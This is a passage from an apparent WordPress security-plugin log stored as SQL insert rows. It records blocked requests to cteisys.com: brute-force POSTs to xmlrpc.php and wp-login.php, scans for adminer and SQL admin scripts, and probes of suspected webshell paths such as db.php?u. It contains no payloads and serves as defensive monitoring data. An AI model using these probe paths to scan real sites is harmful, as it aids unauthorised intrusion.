Safari\\/537.36\"}','upwQAHSIBxc6kDdTPMezREGa',0,1665722101.6750,1061,'','POST',403,0,515,0,1,'',0),('183.90.250.15',3076192783,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','09tbJ5lKTouZAjr2XnvMGsLh',0,1665722102.3025,1026,'','POST',403,0,515,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','G059mXeQTwRgqbkav3UdtWOM',0,1665722457.9908,11780,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/mysql.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','TVlr3yDCwGhMxgnXFbouNacY',0,1665722467.6892,2251,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/sql.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','0YjWF4NzEXGcLB6mrAfVIgM9',0,1665722470.3940,318,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/ad.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','b6ekTqNGz81KXAro0jhyOmEB',0,1665722471.1582,285,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','yZ4rUk8cau7JhAtzlpvMmFjb',0,1665722471.9381,326,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.2.5.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','vkH2Wz6Nxnqwg7PQMa5X9foC',0,1665722472.7231,292,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.3.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML like Gecko) Chrome\\/44.0.2403.155 Safari\\/537.36\"}','IibTq9cQaeL3DOzSd27gjJk0',0,1665722473.4490,304,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.3.1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','Yj1HB5SoatfM9gXxJ4l0iC3m',0,1665722474.2355,302,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.4.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','s9q2Am7MOFnzDperGvQHyTKb',0,1665722474.9916,290,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.5.0.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','NH64EBAOfYZomd3tbick5UF0',0,1665722475.7322,320,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.6.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','VjrlGRbOS5zMn9JY3Bf1H4vd',0,1665722476.5295,307,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.6.1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','3iD7IM0mWkGUOfBKQYLRZlVE',0,1665722477.3065,297,'','GET',403,0,700,0,1,'',0),('20.243.212.221',351524061,'','http://cteisys.com/adminer-4.6.2.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\"}','NGFlLQEBvXYojVp2aZfwnzhR',0,1665722478.0460,292,'','GET',403,0,700,0,1,'',0),('192.227.155.193',3236142017,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','A5ayf0s9tHDdbPWlOSpen2iN',0,1665722569.3737,7190,'','POST',403,0,600,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','jD1pGextWRynm3AiwoTc92SU',0,1665722625.3951,1999,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','JGhxZ25BEARd7CFqaY4mOuNP',0,1665722625.1862,2232,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','VYtXQjyPxqWAwLZ8bzGDNCUk',0,1665722636.0210,525,'','POST',403,0,515,0,1,'',0),('2.59.119.2',37451522,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','c98kzJrmAD3U6BgnLuRbEedi',0,1665722639.8633,603,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','xEbRXnIK4Ww9lz17JStshBPT',0,1665722644.6055,1205,'','POST',403,0,515,0,1,'',0),('183.90.250.15',3076192783,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Ftemdj3KzHiNWYERbU5ucO6S',0,1665722644.7867,1193,'','POST',403,0,515,0,1,'',0),('45.130.229.130',763553154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','umIazKlwpq8nF0ORyhXkts2Y',0,1665722657.1418,643,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','WcrSl1wTEOhZqzoUH8CmdJ0L',0,1665722660.8132,488,'','POST',403,0,515,0,1,'',0),('136.144.251.177',2291202993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','EF26UJZ7MR9pyndzisLgXNkc',0,1665722667.4907,620,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','htg9yjDGTVmRsqkwBQEpCdIK',0,1665722688.3145,1664,'','POST',403,0,515,0,1,'',0),('205.185.120.53',3451484213,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','zjrgfZ048uXoamHEhOY95ySi',0,1665723247.0302,1332,'','POST',403,0,600,0,1,'',0),('121.78.79.85',2035175253,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','9WZaD2HznPjSkwAyei0gUplb',0,1665723923.8543,17712,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','ic3pUV8jf7RdoDB15uYO6qAL',0,1665723931.7643,9941,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MtyPgvEFKwaszcqd9n2ufmTY',0,1665723929.8832,11822,'','POST',403,0,515,0,1,'',0),('91.151.70.28',1536640540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','L0tFUkwMyW86gxDesC2VZqmS',0,1665729790.8242,6986,'','POST',403,0,515,0,1,'',0),('103.155.93.241',1738235377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','YHRB7VGEjoWcSMCe4am2s6uw',0,1665729905.2398,2164,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','Mrb7ZRJYvka4gselUFxW120E',0,1665729907.4428,548,'','POST',403,0,515,0,1,'',0),('125.212.229.33',2111104289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OycHIm3QUf2CsRxWztD48Vbo',0,1665729913.6383,17632,'','POST',403,0,515,0,1,'',0),('51.13.81.56',856510776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','C5N1xQSwhiJqXIfsLG72graO',0,1665729915.0322,16238,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','ElQ2PnLzJhoXv3VyFjATG9fS',0,1665730248.0832,13909,'','POST',403,0,515,0,1,'',0),('104.255.174.93',1761586781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','SCv8jKqV649GJPyxZircQUIa',0,1665730243.3299,18663,'','POST',403,0,515,0,1,'',0),('139.59.127.114',2335932274,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','yXabslp7YQmwdToE45JOkKuR',0,1665730257.2182,4777,'','POST',403,0,515,0,1,'',0),('82.165.85.145',1386567057,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','xWdyV8lZv7GOSoEtT4XgcY2w',0,1665730269.8715,578,'','POST',403,0,515,0,1,'',0),('156.67.211.101',2621690725,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','gbKDhUZRC3O4F97smnATofp8',0,1665730271.6738,579,'','POST',403,0,515,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','mHecswRhQ6r1ETyng9xj4CKa',0,1665730287.6269,576,'','POST',403,0,515,0,1,'',0),('51.79.207.190',860868542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','iuz4e6ICwM5GH1XdhOSAL3Qm',0,1665730288.8198,557,'','POST',403,0,515,0,1,'',0),('116.202.128.32',1959428128,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','3yDzo6MVm0RsL7iJPjKbXrU5',0,1665730291.3868,621,'','POST',403,0,515,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','S5rOqkZ9IEbGiovhdyn6AYWK',0,1665730296.4199,520,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','B7p1dj63TE0RrOSGcveH5XtN',0,1665730303.1350,562,'','POST',403,0,515,0,1,'',0),('103.155.93.241',1738235377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','CXreYQhpaj1dI83H79NxR6gJ',0,1665730646.8052,17480,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','J8AYTrEuhygtIxzsNXPademK',0,1665730645.7975,18493,'','POST',403,0,515,0,1,'',0),('206.72.195.89',3460875097,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','l9X0WUk178bziFurYBtn4AEM',0,1665730645.7970,18589,'','POST',403,0,515,0,1,'',0),('82.165.85.145',1386567057,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','ehlQTR6MXuAIBsjwWDJoCP3L',0,1665730672.0923,486,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','nxbgrDsRlVjJt6wEOhcqdvpf',0,1665730678.1665,497,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','bihRpI8JFq2x65wmBvUV0WQG',0,1665730680.0417,1259,'','POST',403,0,515,0,1,'',0),('194.59.164.178',3258688690,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','QZThdglrVHj2aWSCDB8f06EY',0,1665730695.7165,17643,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','24MGNv958BCgzWprIxUFAQyl',0,1665730701.8561,11855,'','POST',403,0,515,0,1,'',0),('89.46.105.239',1496213999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','2GcNw7st8JLfjz4dBu3OTAIC',0,1665730708.7891,5242,'','POST',403,0,515,0,1,'',0),('50.73.33.135',843653511,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','PCv3YcIhnSrbFlpqZtXWxkiN',0,1665730721.5675,578,'','POST',403,0,515,0,1,'',0),('161.97.90.217',2707512025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','WqG37zDnfV9xiavrUgRXd86B',0,1665730928.9093,15580,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','TcirVgQexd9XDzC723tN8hwU',0,1665730926.9563,17537,'','POST',403,0,515,0,1,'',0),('103.155.93.241',1738235377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','h8xg1Z30GLeoU5AVRONpPwHD',0,1665730928.9941,15533,'','POST',403,0,515,0,1,'',0),('216.158.228.157',3634291869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','eqlFpCyxLZw37hstdWYOoUkI',0,1665730958.7859,10714,'','POST',403,0,515,0,1,'',0),('178.128.63.148',2994749332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','hJlubTwY76FI1t3SHDgdfrBU',0,1665730958.7932,10712,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','uzIHlGK2k605CmZDeMPShc9x',0,1665730964.9131,4597,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','9izKgBFuZYqy1SATD7n2RbWU',0,1665730972.9639,723,'','POST',403,0,515,0,1,'',0),('87.236.20.147',1475089555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jMpCFb96KOeTrL5QPSIvZxAB',0,1665730973.7204,547,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','EHwlVkK6udpASQecgmsq2x3v',0,1665730980.1616,533,'','POST',403,0,515,0,1,'',0),('120.25.147.55',2014942007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','n5e0aYkjNCD1QOdPTvfV4ZBl',0,1665730983.3873,583,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','10FuDbAH8Y3UWiB5vhqPwcnX',0,1665730989.2745,5470,'','POST',403,0,515,0,1,'',0),('35.202.169.54',600484150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KkVhXNbJn7LxZaid6yeI1wQG',0,1665731010.6428,18194,'','POST',403,0,515,0,1,'',0),('185.107.112.221',3110826205,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','NvSMXxp4AIeuOKg3U1iQj0Bq',0,1665731012.3508,16495,'','POST',403,0,515,0,1,'',0),('183.90.250.15',3076192783,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','zSr3E4soHT8JMnvyX9lPwK5p',0,1665731011.8496,17000,'','POST',403,0,515,0,1,'',0),('82.156.16.146',1385959570,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','a2rT0zvCbQ5Mwu7jcx3RXsPe',0,1665731723.9878,549,'','POST',403,0,515,0,1,'',0),('51.79.207.190',860868542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','KmiCugsx6jQ4MaD3tl2V7Xwe',0,1665731726.7838,620,'','POST',403,0,515,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','VASTgRN12opawbi3kj0dmv4O',0,1665732159.0839,17482,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5x6Njiv3sqAJOl82zcDouBFn',0,1665733388.2042,19035,'','POST',403,0,515,0,1,'',0),('213.152.162.154',3583550106,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ehT3dKESwaYnbP8IjZHztvsJ',0,1665733561.0957,1313,'','POST',403,0,515,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','5sDfNAOnCvlmVxBZJW4zXapI',0,1665733694.5637,7932,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','mcE6afjRJ4dzBhF0M3WSCyLv',0,1665800729.5671,555,'','POST',403,0,600,0,1,'',0),('168.138.27.184',2827623352,'','http://cteisys.com//wp-content/plugins/seoplugins/db.php?u','','{\"1\":\"\"}','d6n8ch5p4AVGaQMolITzRYry',0,1665801021.1841,7734,'','GET',403,0,700,0,1,'',0),('168.138.27.184',2827623352,'','http://cteisys.com//wp-content/themes/seotheme/db.php?u','','{\"1\":\"\"}','31rpDNf6aMGuTHwPQqE8n5et',0,1665801017.4646,11459,'','GET',403,0,700,0,1,'',0),('168.138.27.184',2827623352,'','http://cteisys.com//wp-content/themes/pridmag/db.php?u','','{\"1\":\"\"}','SLZNWXOQmbKfxwPM3l4Bo28v',0,1665801023.4541,5470,'','GET',403,0,700,0,1,'',0),('178.162.204.238',2997013742,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dDLTeQNbaZMqWlitKVrw6JGX',0,1665801204.3133,15133,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','irJODyCM6t35WjfIYcUN0zPX',0,1665886824.8203,18841,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AvtUgsnSBHW78wPu2VELC5pl',0,1665887790.5405,18522,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y7LI12KBp9AcR3Uf0aE8PWNw',0,1665887793.1242,15967,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/dp_evolve/js/back-end/libraries/fileuploader/upload_handler.php','','{\"1\":\"ALittle Client\"}','qXcIt4jMWneJ5FbwQRZ1sCui',0,1665887873.8465,287,'','GET',403,0,700,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lIdeSr6vPnk2XW5s87N4g39y',0,1665888119.7018,1021,'','POST',403,0,515,0,1,'',0),('8.210.174.93',148024925,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZKIPWw9DfMH5dv0e1C3BLmYF',0,1665888119.0676,1876,'','POST',403,0,515,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','YDWOoc08BFxl6a3wG4US1epn',0,1665888393.9448,476,'','POST',403,0,600,0,1,'',0),('178.162.204.238',2997013742,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 